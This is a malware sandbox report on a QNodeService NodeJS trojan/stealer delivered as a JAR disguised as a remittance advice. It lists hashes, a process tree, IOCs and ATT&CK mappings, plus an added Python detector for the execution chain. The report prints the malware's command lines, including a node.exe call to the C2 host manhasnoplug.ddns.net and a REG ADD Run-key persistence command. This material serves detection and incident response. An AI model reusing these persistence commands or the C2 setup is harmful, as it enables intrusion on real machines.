Remittance Advice from Prespa Consultancy Pty Ltd.jar

General

Target:    Remittance Advice from Prespa Consultancy Pty Ltd.jar
Filesize:  76KB
Completed: 23-11-2020 00:57
Score:     10/10
MD5:       00fbaeac41cb0a4dbc032fd8593e5ae7
SHA1:      4749439b523248dabe38e0236fe4dcb77ae55c24
SHA256:    d0276ecaa9b9c49b3b1d53d5a6fd47288a33e626d6255a476c624d86dccf2fad

Signatures (8)

  • QNodeService

    Description

    Trojan/stealer written in NodeJS and spread via Java downloader.

  • Executes dropped EXE
    Processes: node.exe (3 instances)

    Reported IOCs

    PID   Process
    2896  node.exe
    3228  node.exe
    900   node.exe
  • Adds Run key to start application
    Process: reg.exe

    TTPs

    Registry Run Keys / Startup Folder; Modify Registry

    Reported IOCs

    Key created (reg.exe):
      \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Set value, str (reg.exe):
      \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\5ff9ec49-7764-45c2-9528-c05b5d236334 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""
  • JavaScript code in executable

    Reported IOCs

    Resource                                      YARA rule
    behavioral2/files/0x000100000001aba0-177.dat  js
    behavioral2/files/0x000100000001aba0-180.dat  js
    behavioral2/files/0x000100000001aba0-184.dat  js
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    Flow  IOC
    21    wtfismyip.com
    22    wtfismyip.com
  • Checks processor information in registry
    Process: node.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry; System Information Discovery

    Reported IOCs (all by node.exe)

    Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString
    Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
  • Suspicious behavior: EnumeratesProcesses
    Processes: node.exe (3 instances)

    Reported IOCs

    PID   Process   Events reported
    2896  node.exe  4
    3228  node.exe  4
    900   node.exe  10
  • Suspicious use of WriteProcessMemory
    Processes: java.exe, javaw.exe, node.exe (3 instances), cmd.exe

    Reported IOCs (the sandbox lists each write twice)

    Description                       PID   Process    Target process
    PID 636 wrote to memory of 3644   636   java.exe   javaw.exe
    PID 3644 wrote to memory of 2896  3644  javaw.exe  node.exe
    PID 2896 wrote to memory of 3228  2896  node.exe   node.exe
    PID 3228 wrote to memory of 900   3228  node.exe   node.exe
    PID 900 wrote to memory of 3868   900   node.exe   cmd.exe
    PID 3868 wrote to memory of 3724  3868  cmd.exe    reg.exe
Processes (7)
  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar "C:\Users\Admin\AppData\Local\Temp\Remittance Advice from Prespa Consultancy Pty Ltd.jar"
    Suspicious use of WriteProcessMemory
    PID:636
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\2693ee72.tmp
      Suspicious use of WriteProcessMemory
      PID:3644
      • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain manhasnoplug.ddns.net
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_fpk140\boot.js --hub-domain manhasnoplug.ddns.net
          Executes dropped EXE
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of WriteProcessMemory
          PID:3228
          • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_fpk140\boot.js --hub-domain manhasnoplug.ddns.net
            Executes dropped EXE
            Checks processor information in registry
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of WriteProcessMemory
            PID:900
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "5ff9ec49-7764-45c2-9528-c05b5d236334" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              Suspicious use of WriteProcessMemory
              PID:3868
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "5ff9ec49-7764-45c2-9528-c05b5d236334" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                Adds Run key to start application
                PID:3724
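The process tree above, the Run-key write reported under "Adds Run key to start application" and the wtfismyip.com flows can be turned into host detection logic. The following Python is an added example written for this page, not code from the sandbox vendor or from the sample: it runs over Sysmon-style events constructed here to mirror the report's chain (process creation, registry value set, DNS query), flags each stage, and extracts the --hub-domain C2 value from the node.exe command line. The event dictionaries, the rule names, the explorer.exe parent of java.exe and the benign node.exe control record are this example's assumptions.

```python
"""Detect the QNodeService execution chain described in this report.

Added example for this page (not the sandbox's or the sample's own code). The
events below are constructed to mirror the report's process tree, Run-key
write and wtfismyip.com lookup, using Sysmon field names (EventID 1 = process
create, 13 = registry value set, 22 = DNS query). Nothing here is a real log.
"""
import re
from typing import Dict, List, Tuple

JAVA_IMAGES = {"java.exe", "javaw.exe"}
IP_LOOKUP_DOMAINS = {"wtfismyip.com"}  # network IOC from the report
HUB_DOMAIN_RE = re.compile(r"--hub-domain\s+(\S+)", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)
# Run value whose data launches a script through cmd, e.g. cmd /D /C "...\boot.vbs"
SCRIPT_VIA_CMD_RE = re.compile(
    r"cmd(\.exe)?\s+(/d\s+)?/c\s+.*\.(vbs|js|wsf|bat|cmd)\b", re.IGNORECASE)
RELAUNCH_TMP_RE = re.compile(r"-jar\s+\S+\.tmp\b", re.IGNORECASE)

# Constructed events modelled on the report (PIDs and paths taken from it).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "ProcessId": "636",
     "Image": r"C:\ProgramData\Oracle\Java\javapath\java.exe",
     "ParentImage": r"C:\Windows\explorer.exe",  # assumed launcher, not in the report
     "CommandLine": r'java -jar "C:\Users\Admin\AppData\Local\Temp\Remittance Advice from Prespa Consultancy Pty Ltd.jar"'},
    {"EventID": "1", "ProcessId": "3644",
     "Image": r"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe",
     "ParentImage": r"C:\ProgramData\Oracle\Java\javapath\java.exe",
     "CommandLine": r'"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\2693ee72.tmp'},
    {"EventID": "1", "ProcessId": "2896",
     "Image": r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe",
     "ParentImage": r"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe",
     "CommandLine": r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain manhasnoplug.ddns.net"},
    {"EventID": "13", "ProcessId": "3724",
     "Image": r"C:\Windows\system32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\5ff9ec49-7764-45c2-9528-c05b5d236334",
     "Details": r'cmd /D /C "C:\Users\Admin\qhub\node\2.0.10\boot.vbs"'},
    {"EventID": "22", "ProcessId": "900",
     "Image": r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe",
     "QueryName": "wtfismyip.com"},
    # Benign control (constructed): a developer running Node from a shell must not fire.
    {"EventID": "1", "ProcessId": "4100",
     "Image": r"C:\Program Files\nodejs\node.exe",
     "ParentImage": r"C:\Windows\system32\cmd.exe",
     "CommandLine": "node server.js"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def hub_domain(command_line: str) -> str:
    """Return the C2 hub passed via --hub-domain, or '' when absent."""
    m = HUB_DOMAIN_RE.search(command_line)
    return m.group(1) if m else ""


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (rule, pid, evidence) for every event matching a stage of the chain."""
    hits: List[Tuple[str, str, str]] = []
    for ev in events:
        eid, pid = ev.get("EventID"), ev.get("ProcessId", "?")
        image = basename(ev.get("Image", ""))
        if eid == "1":
            parent = basename(ev.get("ParentImage", ""))
            cmd = ev.get("CommandLine", "")
            # Stage 1: java.exe relaunches the JAR via javaw.exe from a .tmp copy
            if image == "javaw.exe" and parent in JAVA_IMAGES and RELAUNCH_TMP_RE.search(cmd):
                hits.append(("java_relaunch_from_tmp", pid, cmd))
            # Stage 2: a Java process spawns a Node runtime dropped under the user profile
            if image == "node.exe" and parent in JAVA_IMAGES:
                hits.append(("java_spawns_node", pid, cmd))
            # QNodeService-specific: node.exe started with --hub-domain <C2>
            dom = hub_domain(cmd)
            if image == "node.exe" and dom:
                hits.append(("qnodeservice_hub_domain", pid, dom))
        elif eid == "13":
            # Stage 3: Run-key persistence whose payload is cmd /C <script host file>
            target, data = ev.get("TargetObject", ""), ev.get("Details", "")
            if RUN_KEY_RE.search(target) and SCRIPT_VIA_CMD_RE.search(data):
                hits.append(("run_key_script_persistence", pid, data))
        elif eid == "22":
            # Stage 4: external IP discovery via a public lookup service
            query = ev.get("QueryName", "").lower()
            if query in IP_LOOKUP_DOMAINS:
                hits.append(("external_ip_lookup", pid, query))
    return hits


if __name__ == "__main__":
    for rule, pid, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule:28} pid={pid:<5} {evidence}")
```

Run as a script to print one line per matched stage. One caveat on coverage: Sysmon records registry key creation and value writes (which is how the reg.exe Run-key entry surfaces as EventID 13) but not value reads, so the CentralProcessor \~MHz and ProcessorNameString queries reported above will not appear in Sysmon telemetry; seeing that sandbox check needs registry auditing, ETW registry tracing or Procmon-level visibility.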
MITRE ATT&CK Matrix

Persistence:      Registry Run Keys / Startup Folder
Defense Evasion:  Modify Registry
Discovery:        Query Registry; System Information Discovery

Downloads
• C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp
  (zero-byte file: these are the digests of empty input)
  MD5:    d41d8cd98f00b204e9800998ecf8427e
  SHA1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

• C:\Users\Admin\AppData\Local\Temp\2693ee72.tmp
  (same digests as the submitted JAR: the .tmp is a copy of the sample, which javaw.exe relaunches with -jar)
  MD5:    00fbaeac41cb0a4dbc032fd8593e5ae7
  SHA1:   4749439b523248dabe38e0236fe4dcb77ae55c24
  SHA256: d0276ecaa9b9c49b3b1d53d5a6fd47288a33e626d6255a476c624d86dccf2fad
  SHA512: 9e6fc3e8b5cf6a31b90c624d4c47240aed90e613c508640855585033a83ca3e8b4b5b67bc469a049652968da02fa5f7390f9c1f3e828dfc26c8ea7b5ee98fc89

• C:\Users\Admin\AppData\Local\Temp\_qhub_node_fpk140\boot.js
  MD5:    3859487feb5152e9d1afc4f8cd320608
  SHA1:   7bf154c9ddf3a71abf15906cdb60773e8ae07b62
  SHA256: 8d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13
  SHA512: 826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8

• C:\Users\Admin\node-v14.12.0-win-x64\node.exe
  (listed three times in the report, once per node.exe process; the digests are identical)
  MD5:    f0b11a5823c45fc2664e116dc0323bcb
  SHA1:   612339040c1f927ec62186cd5012f4bb9c53c1b9
  SHA256: 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
  SHA512: 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

• Memory dumps
  memory/900-185-0x000002E364400000-0x000002E364401000-memory.dmp
  memory/900-183-0x0000000000000000-mapping.dmp
  memory/2896-176-0x0000000000000000-mapping.dmp
  memory/2896-178-0x0000036A78540000-0x0000036A78541000-memory.dmp
  memory/3228-179-0x0000000000000000-mapping.dmp
  memory/3228-181-0x000001E05A140000-0x000001E05A141000-memory.dmp
  memory/3644-56-0x0000000000000000-mapping.dmp
  memory/3724-187-0x0000000000000000-mapping.dmp
  memory/3868-186-0x0000000000000000-mapping.dmp